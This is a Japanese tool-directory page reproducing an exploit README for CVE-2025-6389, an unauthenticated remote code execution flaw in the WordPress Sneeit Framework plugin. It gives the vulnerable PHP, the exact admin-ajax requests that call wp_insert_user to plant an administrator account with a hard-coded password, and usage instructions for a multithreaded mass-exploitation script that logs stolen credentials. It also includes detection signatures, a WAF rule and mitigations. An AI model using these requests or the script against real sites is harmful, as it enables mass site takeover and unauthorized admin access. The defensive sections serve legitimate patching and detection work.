Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-6389 — Sneeit Framework <= 8.3 - sneeit_articles_pagination_callback における未認証のリモートコード実行 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2025-6389
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミング
GitHubnxploited/cve-2025-6389

CVE-2025-6389

Sneeit Framework <= 8.3 - sneeit_articles_pagination_callback における未認証のリモートコード実行

リポジトリを見る
14ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-6389

Sneeit Framework <= 8.3 - sneeit_articles_pagination_callback における認証なしリモートコード実行

root@kitploit:~
    _______      ________    ___   ___ ___  _____         __ ____   ___   ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \| ____|       / /|___ \ / _ \ / _ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | |__ ______ / /_  __) | (_) | (_) |
 | |      \ \/ / |  __|______/ /| | | |/ /|___ \______| '_ \|__ < > _ < \__, |
 | |____   \  /  | |____    / /_| |_| / /_ ___) |     | (_) |__) | (_) |  / / 
  \_____|   \/   |______|  |____|\___|/____|____/       \___/____/ \___/  /_/  

Telegram CVE CVSS Python

License

📡 次の情報をお見逃しなく。 Telegram で @KNxploited をフォロー — 新しく公開された CVE、動作するエクスプロイト、精鋭のセキュリティ研究の決定版チャンネルです。最初に知り、最初に行動しましょう。


🧠 概要

CVE-2025-6389 は、WordPress 用 Sneeit Framework プラグインで発見された CVSS 9.8 Critical のリモートコード実行 (RCE) 脆弱性です。

この欠陥は sneeit_articles_pagination_callback() 関数に存在し、ユーザー指定の入力を PHP の call_user_func() に無検証で渡します。認証されていない攻撃者は、wp_insert_user を含む任意の PHP 関数を任意の引数で呼び出せ、事実上 完全な管理者アクセスを取得したり、任意のサーバーサイドコードを実行したりできます。

フィールド詳細
CVE IDCVE-2025-6389
プラグインSneeit Framework (sneeit-framework)
影響を受けるバージョン8.3 までのすべてのバージョン
脆弱性の種類リモートコード実行 (RCE)
攻撃ベクトルネットワーク — 認証不要
CVSS 3.1 スコア9.8 CRITICAL
CVSS ベクターAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
影響サーバー完全乗っ取り / 管理者権限の奪取
研究者Nxploited

💀 脆弱性の詳細

根本原因は、プラグインの AJAX ハンドラー内での PHP の call_user_func() の誤用です:

root@kitploit:~
// Registered without authentication check
add_action('wp_ajax_nopriv_sneeit_articles_pagination', 'sneeit_articles_pagination_callback');

function sneeit_articles_pagination_callback() {
    $callback = $_POST['callback'];  // ← User-controlled function name
    $args     = json_decode(stripslashes($_POST['args']), true); // ← User-controlled args

    // Calling ANY PHP function with ANY arguments — zero validation
    $result = call_user_func($callback, ...$args);

    echo $result;
    die();
}

なぜこれが Critical なのか:

  • wp_ajax_nopriv_* = ログイン不要で誰でもアクセス可能
  • call_user_func($callback, $args) = 任意の関数呼び出し
  • 攻撃者は var_dump、system、wp_insert_user、eval または任意の PHP/WordPress 関数を呼び出せます
  • 応答が直接返されるため、ブラインドおよび詳細な RCE が可能になります

⚔️ エクスプロイトチェーン

root@kitploit:~
Step 1 — Probe / Fingerprint
──────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
  action   = sneeit_articles_pagination
  callback = var_dump
  args     = ["test"]

Expected Response → array(1) { [0]=> string(4) "test" }
  ↓
Confirms: call_user_func() is reachable and reflecting output

──────────────────────────────────────────────────────────────────
Step 2 — Admin Account Creation
──────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
  action   = sneeit_articles_pagination
  callback = wp_insert_user
  args     = {"user_login":"Nxploited_XXXX",
               "user_pass":"xplpass",
               "user_email":"...",
               "role":"administrator"}

Result → New administrator account silently created on target
  ↓
Full WordPress admin panel access achieved ✔️

⚙️ 要件

root@kitploit:~
pip install requests rich
依存パッケージ用途
requestsセッション/プロキシ対応の HTTP リクエスト
richライブ端末ダッシュボード、パネル、進捗表示
threading複数ターゲットの並行処理
queueスレッドセーフなターゲット分散

Python 3.8+ が必要です。型ヒントは 3.9+ で導入された tuple[...] 構文を使用しています — 最適な互換性のため 3.9+ を使用してください。


📂 ファイル構成

root@kitploit:~
CVE-2025-6389/
├── CVE-2025-6389.py          # Main exploit script
├── list.txt                  # Target URLs — one per line
├── success_results.txt       # Auto-generated: successful targets + credentials
└── debug_responses/          # Auto-generated: raw server responses for debugging
    └── <target>.resp.txt

🚀 使用方法

ステップ 1 — ターゲットを準備

1行に1つのURLを記述した list.txt を作成します:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com

http:// または https:// のない URL には、自動的に http:// が付加されます。


ステップ 2 — エクスプロイトを実行

root@kitploit:~
python CVE-2025-6389.py

以下のプロンプトが表示されます:

root@kitploit:~
Targets file name (default list.txt): list.txt
Number of threads (default 10):       20

ステップ 3 — ライブダッシュボード

スクリプトは、以下のようなリアルタイムの Rich ダッシュボードを起動します:

root@kitploit:~
┌─────────────────────────────────────────────────────────────────────┐
│  [ASCII BANNER]                                                      │
├──────────────────────────────┬──────────────────────────────────────┤
│  Info                        │  Stats                               │
│  Usage: Put targets in...    │  Total Targets:  150                 │
│  Threads: 20                 │  Processed:      87                  │
│  Password: xplpass           │  Successes:      12                  │
│  Success Log: success...     │  Failures:       75                  │
│  Debug Dir: debug_responses  │  Elapsed:        00:01:43            │
├──────────────────────────────┴──────────────────────────────────────┤
│  Recent Results                                                      │
│  Time     Target                              Result                 │
│  14:23:01 https://victim.com                  SUCCESS               │
│  14:23:03 https://example.net                 FAIL                  │
└─────────────────────────────────────────────────────────────────────┘

ステップ 4 — 結果を確認

成功したエクスプロイトは success_results.txt に保存されます:

root@kitploit:~
https://victim.com | USER: Nxploited_4821 | PASS: xplpass | EMAIL: [email protected]

デバッグ応答 (失敗したターゲット用) は debug_responses/ に保存されます:

root@kitploit:~
debug_responses/
└── https___victim.com.resp.txt   ← Raw server response for analysis

🖥️ スクリプトパラメータリファレンス

プロンプトデフォルト説明
ターゲットファイルlist.txtターゲット URL を記載したファイル
スレッド数10 (最大: 200)同時実行ワーカー数 — 一括スキャン時は増加
パスワードxplpass (ハードコード)作成された管理者アカウントに設定するパスワード
ユーザー名の形式Nxploited_XXXXランダムな4桁の接尾辞が付いた自動生成

📊 検出シグネチャ

このエクスプロイトは、次のネットワークシグネチャを生成します — 防御側や WAF ルール作成者にとって有用です:

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=sneeit_articles_pagination&callback=<FUNCTION>&args=<JSON>

WAF / IDS ルール (擬似コード):

root@kitploit:~
IF request.method == POST
AND request.path  == "/wp-admin/admin-ajax.php"
AND request.body CONTAINS "sneeit_articles_pagination"
AND request.body CONTAINS "callback"
THEN BLOCK + ALERT

🛡️ 緩和策と修復

サイト運営者、開発者、防御側の方は、直ちに次の手順を実行してください:

  • ✅ パッチが利用可能な場合は、Sneeit Framework を 8.3 より後のバージョンへ 更新する
  • ✅ パッチ適用済みバージョンが確認されるまで、プラグインを停止して削除する
  • ✅ 最近作成された WordPress 管理者アカウントに不正なエントリがないか監査する
  • ✅ サーバーサイドの入力検証を実装する — ユーザー入力を call_user_func() に渡さない
  • ✅ WAF/ファイアウォールレベルで admin-ajax.php への認証なし POST リクエストをブロックする
  • ✅ サーバーログで sneeit_articles_pagination AJAX アクション呼び出しを監視する
  • ✅ 封じ込め措置として、既存のすべての管理者アカウントに二要素認証を有効化する

⚠️ 免責事項

root@kitploit:~
THIS TOOL IS PROVIDED STRICTLY FOR EDUCATIONAL, AUTHORIZED PENETRATION
TESTING, AND SECURITY RESEARCH PURPOSES ONLY.

By downloading, running, or modifying this script, you explicitly agree:

  • You have EXPLICIT, WRITTEN authorization from the owner of every
    system you test. No exceptions.

  • You are operating within a controlled lab environment or during a
    formally scoped and authorized engagement.

  • You will NOT deploy this tool against any system, network, or
    infrastructure you do not have legal permission to test.

  • Nxploited and all contributors assume ZERO liability for any
    unauthorized use, damage, data loss, legal action, or criminal
    prosecution arising from the use of this tool.

Unauthorized use of this exploit is a criminal offense under:
  — Computer Fraud and Abuse Act (CFAA), USA
  — Computer Misuse Act (CMA), UK
  — EU Directive 2013/40/EU on Attacks Against Information Systems
  — And all equivalent national and international cybercrime laws.

USE RESPONSIBLY. HACK ETHICALLY. DISCLOSE RESPONSIBLY.

👤 著者

ハンドルNxploited (Khaled Alenazi)
Telegram@KNxploited
GitHubgithub.com/Nxploited

🔔 Telegram で @KNxploited をフォロー 実際のエクスプロイトが最初に公開されるチャンネル — CVE、ゼロデイ、PoC、 そして詳細な脆弱性調査。定期的に更新。常に先を行こう。


Nxploited によって精密に作成 · 許可されたセキュリティ調査専用 · CVSS 9.8 Critical
ツールをダウンロード